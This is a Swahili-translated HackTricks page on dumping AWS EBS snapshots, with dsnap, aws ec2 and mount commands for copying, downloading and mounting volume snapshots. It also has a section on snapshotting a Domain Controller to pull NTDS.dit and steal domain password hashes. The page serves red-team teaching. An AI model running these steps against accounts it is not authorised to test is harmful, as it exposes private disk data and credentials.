AWS - EBS Snapshot Dump

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Kuangalia picha ya eneo kwa kifaa cha kuhifadhi kwa kifaa cha EBS

# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox

# Get snapshot from image
mkdir snap_wordir; cd snap_workdir
dsnap init
## Download a snapshot of the volume of that instance
## If no snapshot existed it will try to create one
dsnap get <instance-id>
dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
## Other way to get a snapshot
dsnap list #List snapshots
dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly

# Run with vagrant
IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
IMAGE="<download_file>.img" vagrant ssh #Access the VM
vagrant destroy #To destoy

# Run with docker
git clone https://github.com/RhinoSecurityLabs/dsnap.git
cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded

Tafadhali jua kwamba dsnap haitakuruhusu kupakua picha za nakala za umma. Ili kuzunguka hili, unaweza kufanya nakala ya picha ya nakala kwenye akaunti yako binafsi, na upakue hiyo:

# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"

# View the snapshot info
aws ec2 describe-snapshots --owner-ids self --region us-east-2

# Download the snapshot. The ID is the copy from your account
dsnap --region us-east-2 get snap-027da41be451109da

# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2

Kwa habari zaidi kuhusu hii mbinu angalia utafiti wa awali katika https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/

Unaweza kufanya hivi na Pacu kutumia moduli ebs__download_snapshots

Kuchunguza snapshot katika AWS

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

Kuimba kwenye EC2 VM chini ya udhibiti wako (inapaswa kuwa katika eneo moja na nakala ya chelezo):

Hatua ya 1: Kiasi kipya cha ukubwa na aina unayopendelea kinapaswa kuundwa kwa kwenda kwa EC2 –> Volumes.

Ili kutekeleza hatua hii, fuata maagizo haya:

Unda kiasi cha EBS cha kuambatisha kwa kifaa cha EC2.
Hakikisha kiasi cha EBS na kifaa viko katika eneo moja.

Hatua ya 2: Chagua chaguo la "ambatisha kiasi" kwa kubonyeza kulia kwenye kiasi kilichoundwa.

Hatua ya 3: Chagua kifaa kutoka kwenye sanduku la maandishi ya kifaa.

Ili kutekeleza hatua hii, tumia amri ifuatayo:

Ambatisha kiasi cha EBS.

Hatua ya 4: Ingia kwenye kifaa cha EC2 na orodhesha diski zilizopo kwa kutumia amri lsblk.

Hatua ya 5: Angalia ikiwa kiasi kina data yoyote kwa kutumia amri sudo file -s /dev/xvdf.

Ikiwa matokeo ya amri hapo juu yanaonyesha "/dev/xvdf: data", inamaanisha kiasi hicho hakina data.

Hatua ya 6: Fomati kiasi kwa mfumo wa faili wa ext4 kwa kutumia amri sudo mkfs -t ext4 /dev/xvdf. Kwa kuongezea, unaweza pia kutumia muundo wa xfs kwa kutumia amri sudo mkfs -t xfs /dev/xvdf. Tafadhali kumbuka unapaswa kutumia ext4 au xfs.

Hatua ya 7: Unda saraka ya uchaguzi wako kuimba kiasi kipya cha ext4. Kwa mfano, unaweza kutumia jina "newvolume".

Ili kutekeleza hatua hii, tumia amri sudo mkdir /newvolume.

Hatua ya 8: Imba kiasi kwenye saraka ya "newvolume" kwa kutumia amri sudo mount /dev/xvdf /newvolume/.

Hatua ya 9: Badilisha saraka kwenda kwenye saraka ya "newvolume" na angalia nafasi ya diski ili kuthibitisha uimbo wa kiasi.

Ili kutekeleza hatua hii, tumia amri zifuatazo:

Badilisha saraka kwenda /newvolume.
Angalia nafasi ya diski kwa kutumia amri df -h .. Matokeo ya amri hii yanapaswa kuonyesha nafasi ya bure katika saraka ya "newvolume".

Unaweza kufanya hivi na Pacu kwa kutumia moduli ebs__explore_snapshots.

Kuchunguza chelezo katika AWS (kutumia cli)

```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id

Attach new volume to instance

aws ec2 attach-volume --device /dev/sdh --instance-id --volume-id

mount the snapshot from within the VM

sudo file -s /dev/sdh /dev/sdh: symbolic link to `xvdh'

sudo file -s /dev/xvdh /dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63

lsblk /dev/xvdh NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT xvdh 202:112 0 8G 0 disk ├─xvdh1 202:113 0 7.9G 0 part ├─xvdh14 202:126 0 4M 0 part └─xvdh15 202:127 0 106M 0 part

sudo mount /dev/xvdh1 /mnt

ls /mnt

## Nakala ya Kivuli

Mtumiaji yeyote wa AWS mwenye ruhusa ya **`EC2:CreateSnapshot`** anaweza kuiba hash za watumiaji wote wa kikoa kwa kuunda **nakala ya seva ya Kudhibiti Kikoa** kuiunganisha kwa kifaa wanachodhibiti na **kutoa faili za NTDS.dit na SYSTEM** ya usajili kwa matumizi na mradi wa secretsdump wa Impacket.

Unaweza kutumia chombo hiki kiotomatiki shambulio: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) au unaweza kutumia moja ya njia za awali baada ya kuunda nakala.

## Marejeo

* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)

<details>

<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

PreviousAWS - EC2, EBS, SSM & VPC Post Exploitation NextAWS - Malicious VPC Mirror

Last updated 28 days ago